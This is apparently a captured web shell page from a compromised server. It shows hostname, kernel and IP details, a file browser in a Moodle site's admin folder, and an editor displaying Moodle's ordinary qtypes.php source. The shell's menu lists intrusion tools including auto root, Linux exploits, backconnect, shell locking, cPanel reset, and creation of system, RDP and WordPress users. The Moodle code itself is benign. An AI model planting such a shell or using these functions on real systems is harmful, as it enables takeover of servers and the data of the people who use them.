Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.126.134
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
cli
[ DIR ]
drwxr-xr-x
mnet
[ DIR ]
drwxr-xr-x
registration
[ DIR ]
drwxr-xr-x
roles
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
tool
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
webservice
[ DIR ]
drwxr-xr-x
antiviruses.php
3.39
KB
-rw-r--r--
auth.php
2.85
KB
-rw-r--r--
auth_config.php
8.58
KB
-rw-r--r--
blocks.php
9.54
KB
-rw-r--r--
category.php
6.28
KB
-rw-r--r--
contentbank.php
2.76
KB
-rw-r--r--
courseformats.php
2.88
KB
-rw-r--r--
cron.php
2.71
KB
-rw-r--r--
customfields.php
2.08
KB
-rw-r--r--
dataformats.php
2.65
KB
-rw-r--r--
editors.php
2.87
KB
-rw-r--r--
enrol.php
4.19
KB
-rw-r--r--
environment.php
4.17
KB
-rw-r--r--
environment.xml
129.35
KB
-rw-r--r--
filters.php
8.58
KB
-rw-r--r--
index.php
38.18
KB
-rw-r--r--
lib.php
4.49
KB
-rw-r--r--
localplugins.php
2.66
KB
-rw-r--r--
lock.php
2.89
KB
-rw-r--r--
mailout-debugger.php
2.2
KB
-rw-r--r--
media.php
2.38
KB
-rw-r--r--
message.php
6.08
KB
-rw-r--r--
modules.php
6.68
KB
-rw-r--r--
oauth2callback.php
1.88
KB
-rw-r--r--
phpinfo.php
968
B
-rw-r--r--
plagiarism.php
3.17
KB
-rw-r--r--
plugins.php
8.84
KB
-rw-r--r--
portfolio.php
8.5
KB
-rw-r--r--
process_email.php
1.72
KB
-rw-r--r--
purgecaches.php
2.25
KB
-rw-r--r--
qbehaviours.php
8.49
KB
-rw-r--r--
qtypes.php
9.13
KB
-rw-r--r--
renderer.php
93.24
KB
-rw-r--r--
reports.php
4.11
KB
-rw-r--r--
repository.php
16.77
KB
-rw-r--r--
repositoryinstance.php
5.74
KB
-rw-r--r--
resetemoticons.php
1.63
KB
-rw-r--r--
search.php
2.89
KB
-rw-r--r--
searchareas.php
10.89
KB
-rw-r--r--
searchreindex.php
3.16
KB
-rw-r--r--
settings.php
5.49
KB
-rw-r--r--
tasklogs.php
2.91
KB
-rw-r--r--
testoutgoingmailconf.php
3.27
KB
-rw-r--r--
thirdpartylibs.php
2.56
KB
-rw-r--r--
timezone.php
1.55
KB
-rw-r--r--
tools.php
3.55
KB
-rw-r--r--
updatesetting.php
2.39
KB
-rw-r--r--
upgrade.txt
1.71
KB
-rw-r--r--
upgradesettings.php
2.48
KB
-rw-r--r--
user.php
18.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : qtypes.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Allows the admin to manage question types. * * @package moodlecore * @subpackage questionbank * @copyright 2008 Tim Hunt * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once(__DIR__ . '/../config.php'); require_once($CFG->libdir . '/questionlib.php'); require_once($CFG->libdir . '/adminlib.php'); require_once($CFG->libdir . '/tablelib.php'); admin_externalpage_setup('manageqtypes'); $systemcontext = context_system::instance(); require_capability('moodle/question:config', $systemcontext); $canviewreports = has_capability('report/questioninstances:view', $systemcontext); $thispageurl = new moodle_url('/admin/qtypes.php'); $qtypes = question_bank::get_all_qtypes(); $pluginmanager = core_plugin_manager::instance(); // Get some data we will need - question counts and which types are needed. $counts = $DB->get_records_sql(" SELECT qtype, COUNT(1) as numquestions, SUM(hidden) as numhidden FROM {question} GROUP BY qtype", array()); $needed = array(); foreach ($qtypes as $qtypename => $qtype) { if (!isset($counts[$qtypename])) { $counts[$qtypename] = new stdClass; $counts[$qtypename]->numquestions = 0; $counts[$qtypename]->numhidden = 0; } $needed[$qtypename] = $counts[$qtypename]->numquestions > 0 || $pluginmanager->other_plugins_that_require($qtype->plugin_name()); $counts[$qtypename]->numquestions -= $counts[$qtypename]->numhidden; } $needed['missingtype'] = true; // The system needs the missing question type. foreach ($counts as $qtypename => $count) { if (!isset($qtypes[$qtypename])) { $counts['missingtype']->numquestions += $count->numquestions - $count->numhidden; $counts['missingtype']->numhidden += $count->numhidden; } } // Work of the correct sort order. $config = get_config('question'); $sortedqtypes = array(); foreach ($qtypes as $qtypename => $qtype) { $sortedqtypes[$qtypename] = $qtype->local_name(); } $sortedqtypes = question_bank::sort_qtype_array($sortedqtypes, $config); // Process actions ============================================================ // Disable. if (($disable = optional_param('disable', '', PARAM_PLUGIN)) && confirm_sesskey()) { if (!isset($qtypes[$disable])) { print_error('unknownquestiontype', 'question', $thispageurl, $disable); } set_config($disable . '_disabled', 1, 'question'); redirect($thispageurl); } // Enable. if (($enable = optional_param('enable', '', PARAM_PLUGIN)) && confirm_sesskey()) { if (!isset($qtypes[$enable])) { print_error('unknownquestiontype', 'question', $thispageurl, $enable); } if (!$qtypes[$enable]->menu_name()) { print_error('cannotenable', 'question', $thispageurl, $enable); } unset_config($enable . '_disabled', 'question'); redirect($thispageurl); } // Move up in order. if (($up = optional_param('up', '', PARAM_PLUGIN)) && confirm_sesskey()) { if (!isset($qtypes[$up])) { print_error('unknownquestiontype', 'question', $thispageurl, $up); } $neworder = question_reorder_qtypes($sortedqtypes, $up, -1); question_save_qtype_order($neworder, $config); redirect($thispageurl); } // Move down in order. if (($down = optional_param('down', '', PARAM_PLUGIN)) && confirm_sesskey()) { if (!isset($qtypes[$down])) { print_error('unknownquestiontype', 'question', $thispageurl, $down); } $neworder = question_reorder_qtypes($sortedqtypes, $down, +1); question_save_qtype_order($neworder, $config); redirect($thispageurl); } // End of process actions ================================================== // Print the page heading. echo $OUTPUT->header(); echo $OUTPUT->heading(get_string('manageqtypes', 'admin')); // Set up the table. $table = new flexible_table('qtypeadmintable'); $table->define_baseurl($thispageurl); $table->define_columns(array('questiontype', 'numquestions', 'version', 'requires', 'availableto', 'uninstall', 'settings')); $table->define_headers(array(get_string('questiontype', 'question'), get_string('numquestions', 'question'), get_string('version'), get_string('requires', 'admin'), get_string('availableq', 'question'), get_string('settings'), get_string('uninstallplugin', 'core_admin'))); $table->set_attribute('id', 'qtypes'); $table->set_attribute('class', 'admintable generaltable'); $table->setup(); // Add a row for each question type. $createabletypes = question_bank::get_creatable_qtypes(); foreach ($sortedqtypes as $qtypename => $localname) { $qtype = $qtypes[$qtypename]; $row = array(); // Question icon and name. $fakequestion = new stdClass; $fakequestion->qtype = $qtypename; $icon = print_question_icon($fakequestion, true); $row[] = $icon . ' ' . $localname; // Number of questions of this type. if ($counts[$qtypename]->numquestions + $counts[$qtypename]->numhidden > 0) { if ($counts[$qtypename]->numhidden > 0) { $strcount = get_string('numquestionsandhidden', 'question', $counts[$qtypename]); } else { $strcount = $counts[$qtypename]->numquestions; } if ($canviewreports) { $row[] = html_writer::link(new moodle_url('/report/questioninstances/index.php', array('qtype' => $qtypename)), $strcount, array('title' => get_string('showdetails', 'admin'))); } else { $strcount; } } else { $row[] = 0; } // Question version number. $version = get_config('qtype_' . $qtypename, 'version'); if ($version) { $row[] = $version; } else { $row[] = html_writer::tag('span', get_string('nodatabase', 'admin'), array('class' => 'text-muted')); } // Other question types required by this one. $plugin = $pluginmanager->get_plugin_info($qtype->plugin_name()); $requiredtypes = $plugin->get_other_required_plugins(); $strtypes = array(); if (!empty($requiredtypes)) { foreach ($requiredtypes as $required => $notused) { $strtypes[] = $pluginmanager->plugin_name($required); } $row[] = implode(', ', $strtypes); } else { $row[] = ''; } // Are people allowed to create new questions of this type? $rowclass = ''; if ($qtype->menu_name()) { $createable = isset($createabletypes[$qtypename]); $icons = question_types_enable_disable_icons($qtypename, $createable); if (!$createable) { $rowclass = 'dimmed_text'; } } else { $icons = $OUTPUT->spacer(); } // Move icons. $icons .= question_type_icon_html('up', $qtypename, 't/up', get_string('up'), ''); $icons .= question_type_icon_html('down', $qtypename, 't/down', get_string('down'), ''); $row[] = $icons; // Settings link, if available. $settings = admin_get_root()->locate('qtypesetting' . $qtypename); if ($settings instanceof admin_externalpage) { $row[] = html_writer::link($settings->url, get_string('settings')); } else if ($settings instanceof admin_settingpage) { $row[] = html_writer::link(new moodle_url('/admin/settings.php', array('section' => 'qtypesetting' . $qtypename)), get_string('settings')); } else { $row[] = ''; } // Uninstall link, if available. if ($needed[$qtypename]) { $row[] = ''; } else { $uninstallurl = core_plugin_manager::instance()->get_uninstall_url('qtype_'.$qtypename, 'manage'); if ($uninstallurl) { $row[] = html_writer::link($uninstallurl, get_string('uninstallplugin', 'core_admin'), array('title' => get_string('uninstallqtype', 'question'))); } } $table->add_data($row, $rowclass); } $table->finish_output(); echo $OUTPUT->footer(); function question_types_enable_disable_icons($qtypename, $createable) { if ($createable) { return question_type_icon_html('disable', $qtypename, 't/hide', get_string('enabled', 'question'), get_string('disable')); } else { return question_type_icon_html('enable', $qtypename, 't/show', get_string('disabled', 'question'), get_string('enable')); } } function question_type_icon_html($action, $qtypename, $icon, $alt, $tip) { global $OUTPUT; return $OUTPUT->action_icon(new moodle_url('/admin/qtypes.php', array($action => $qtypename, 'sesskey' => sesskey())), new pix_icon($icon, $alt, 'moodle', array('title' => '', 'class' => 'iconsmall')), null, array('title' => $tip)); }
Close